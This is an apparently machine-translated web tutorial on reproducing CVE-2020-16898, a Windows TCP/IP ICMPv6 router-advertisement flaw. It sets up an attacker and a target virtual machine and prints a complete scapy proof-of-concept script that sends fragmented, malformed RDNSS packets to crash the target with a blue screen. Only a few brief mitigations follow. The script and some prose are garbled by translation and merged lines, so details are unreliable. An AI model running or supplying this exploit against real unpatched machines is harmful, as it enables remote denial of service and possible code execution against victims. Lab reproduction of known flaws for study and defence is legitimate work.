In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-04-02 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)05/31 Report--
This article shows you how to reproduce the CVE-2020-16898 vulnerability. The content is concise and easy to understand. It will definitely brighten your eyes. I hope you can get something through the detailed introduction of this article.
Brief introduction of vulnerabilities
A remote execution code intrusion exists when the Windows TCP / IP size improperly processes the ICMPv6 router advertisement packet. An attacker who successfully exploits this intrusion can gain the ability to execute code on the target server or client, which can make the victim blue screen.
In order to exploit this vulnerability, an attacker may have to send a specially designed ICMPv6 router advertising packet to a remote Windows computer.
Loophole analysis
A vulnerability exists when the Windows TCP / IP stack improperly handles ICMPv6 router advertising packets that use option type 25 (recursive DNS server option) with an even number of length field values.
When an even length value is provided, the Windows TCP / IP stack mistakenly reduces the number of rows in the network buffer by 8 bytes. This is because the stack counts internally in 16-byte increments, so the use of non-RFC compatible length values cannot be resolved. This mismatch causes the stack to interpret the last 8 bytes of the current option as the beginning of the second option, resulting in a buffer overflow and potential RCE.
Affect the version
Microsoft Windows 10 1709 Microsoft Windows 10 1803 Microsoft Windows 10 1809 Microsoft Windows 10 1903 Microsoft Windows 10 1909 Microsoft Windows 10 2004 Microsoft Windows Server 2019
Environmental deployment
Attack plane IP:192.168.192.1 (win10 1909)
Target aircraft IP:192.168.192.128 (win10 1809)
Loophole recurrence
Make sure the target machine turns on NAT mode and ipv6.
Click the virtual network editor in full screen mode and then click to change settings
Then open ipv6 and click OK.
Make sure that both machines can ping each other.
Target aircraft ping attack aircraft
Attack aircraft ping target aircraft
Check the ipv6 address of the target machine
Check the ipv6 address of the attack plane.
Then use an online pyload
The content is
From scapy.all import * from scapy.layers.inet6 import ICMPv6NDOptEFA, ICMPv6NDOptRDNSS, ICMPv6ND_RA, IPv6, IPv6ExtHdrFragment Fragment6 v6_dst = "fd15:4ba5:5a2b:1008:5d26:75a3:1641:ee3" # change to the ipv6 address of the target machine or temporary ipv6 address v6_src = "fe80::9548:d004:9491:9c34" # the local ipv6 address of the attacker p_test_half = 'A'.encode () * 8 + b "\ x18\ x30" + b "\ xFF\ x18" p_test = p_test_half +' Aids. Encode () * 4 c = ICMPv6NDOptEFA () e = ICMPv6NDOptRDNSS () e.len = 21e.dns = ["AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA" "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA"] aaa = ICMPv6NDOptRDNSS () aaa.len = 8pkt = ICMPv6ND_RA () / aaa /\ Raw (load='A'.encode () * 16x2 + p_test_half + b "\ x18\ xa0" * 6) / c / e / c / e / c / e / c / e / e p_test_frag = IPv6 (dst=v6_dst, src=v6_src Hlim=255) /\ IPv6ExtHdrFragment () / pkt l=fragment6 (p_test_frag, 200) for p in l: send (p)
The ip of the target machine above should be an ipv6 address or a temporary ipv6 address
The ipv6 of the attack plane needs to link the ipv6 address locally.
When an address is written to payload, an attack can be carried out.
The attack takes advantage of a scapy component that relies on the python environment
Install the python environment on the attack plane (download and configure the environment from the official website)
Scapy is a Python program that enables users to send, sniff, parse and forge network packets. This feature allows you to build tools that can detect, scan, or attack the network.
The command is pip install scapy
If it fails, the python version may be too high. You can choose the python3.7 version.
You can see that I installed this component.
Start scapy and the following interface appears
Cd enters the desktop (this file exists on the desktop)
Then use this command:
Python CVE-2020-16898.py
You can see the blue screen of the injured machine.
The experiment is completed
Vulnerability repair
Try to turn on the firewall
Turn off the ipv6 service
Strictly filter external traffic
The above content is how to reproduce the CVE-2020-16898 vulnerability. Have you learned the knowledge or skills? If you want to learn more skills or enrich your knowledge reserve, you are welcome to follow the industry information channel.
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.